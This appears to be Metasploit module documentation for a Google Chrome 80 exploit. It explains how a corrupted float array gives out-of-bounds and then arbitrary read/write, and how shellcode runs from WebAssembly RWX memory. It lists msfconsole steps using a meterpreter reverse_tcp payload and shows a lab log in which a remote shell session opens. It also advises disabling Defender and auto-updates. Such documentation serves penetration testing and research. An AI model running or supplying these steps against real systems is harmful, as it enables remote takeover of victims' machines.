66 lines
3.2 KiB
Markdown
66 lines
3.2 KiB
Markdown
|
This module exploits an issue in Google Chrome 80.0.3987.87 (64 bit). The exploit corrupts the length of a float array (float_rel), which can then be used for out of bounds read and write on adjacent memory.
|
||
|
|
The relative read and write is then used to modify a UInt64Array (uint64_aarw) which is used for read and writing from absolute memory.
|
||
|
|
The exploit then uses WebAssembly in order to allocate a region of RWX memory, which is then replaced with the payload shellcode.
|
||
|
|
|
||
|
|
**The payload is executed within the sandboxed renderer process, so the browser must be run with the --no-sandbox option for the payload to work correctly.**
|
||
|
|
|
||
|
|
## Vulnerable Application
|
||
|
|
|
||
|
|
The module is compatible with any 64bit Google Chrome (version 80), on any platform (macOS, Linux or Windows), however the code that writes the shellcode into the rwx region (wasm_rwx_addr) may need to be modified for different versions.
|
||
|
|
|
||
|
|
**Vulnerable Application Installation Steps**
|
||
|
|
|
||
|
|
You can download a vulnerable Chrome version from this location:
|
||
|
|
[https://www.filepuma.com/download/google_chrome_64bit_80.0.3987.87-24545/](https://www.filepuma.com/download/google_chrome_64bit_80.0.3987.87-24545/)
|
||
|
|
|
||
|
|
You should ensure that application does not update itself to the latest version (by disabling automatic updates or simply not connecting to the internet).
|
||
|
|
You may also need to disable Windows Defender.
|
||
|
|
|
||
|
|
## Verification Steps
|
||
|
|
|
||
|
|
1. Do: ```use exploit/multi/browser/chrome_jscreate_sideeffect```
|
||
|
|
2. Do: ```set payload windows/x64/meterpreter/reverse_tcp```
|
||
|
|
2. Do: ```set LHOST [IP]```
|
||
|
|
3. Do: ```set SRVHOST [IP]```
|
||
|
|
3. Do: ```set URIPATH / [PATH]```
|
||
|
|
4. Do: ```run```
|
||
|
|
|
||
|
|
## Scenarios
|
||
|
|
|
||
|
|
### Windows 10 and Google Chrome 80.0.3987.87 with --no-sandbox
|
||
|
|
|
||
|
|
Start Google Chrome without a sandbox:
|
||
|
|
|
||
|
|
```"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-sandbox```
|
||
|
|
|
||
|
|
```
|
||
|
|
msf5 > use exploit/multi/browser/chrome_jscreate_sideeffect
|
||
|
|
msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > set URIPATH /
|
||
|
|
URIPATH => /
|
||
|
|
msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > set SRVHOST 192.168.56.1
|
||
|
|
SRVHOST => 192.168.56.1
|
||
|
|
msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
|
||
|
|
PAYLOAD => windows/x64/meterpreter/reverse_tcp
|
||
|
|
msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > set LHOST 192.168.56.1
|
||
|
|
LHOST => 192.168.56.1
|
||
|
|
msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > exploit
|
||
|
|
[*] Exploit running as background job 0.
|
||
|
|
[*] Exploit completed, but no session was created.
|
||
|
|
msf5 exploit(multi/browser/chrome_jscreate_sideeffect) >
|
||
|
|
[*] Started reverse TCP handler on 192.168.56.1:4444
|
||
|
|
[*] Using URL: http://192.168.56.1:8080/
|
||
|
|
[*] Server started.
|
||
|
|
|
||
|
|
msf5 exploit(multi/browser/chrome_jscreate_sideeffect) >
|
||
|
|
[*] 192.168.56.3 chrome_jscreate_sideeffect - Sending / to Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36
|
||
|
|
[*] Sending stage (206403 bytes) to 192.168.56.3
|
||
|
|
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.3:49677) at 2020-03-04 21:22:38 +0800
|
||
|
|
|
||
|
|
msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > sessions 1
|
||
|
|
[*] Starting interaction with 1...
|
||
|
|
|
||
|
|
meterpreter > pwd
|
||
|
|
C:\Program Files (x86)\Google\Chrome\Application\80.0.3987.87
|
||
|
|
meterpreter >
|
||
|
|
```
|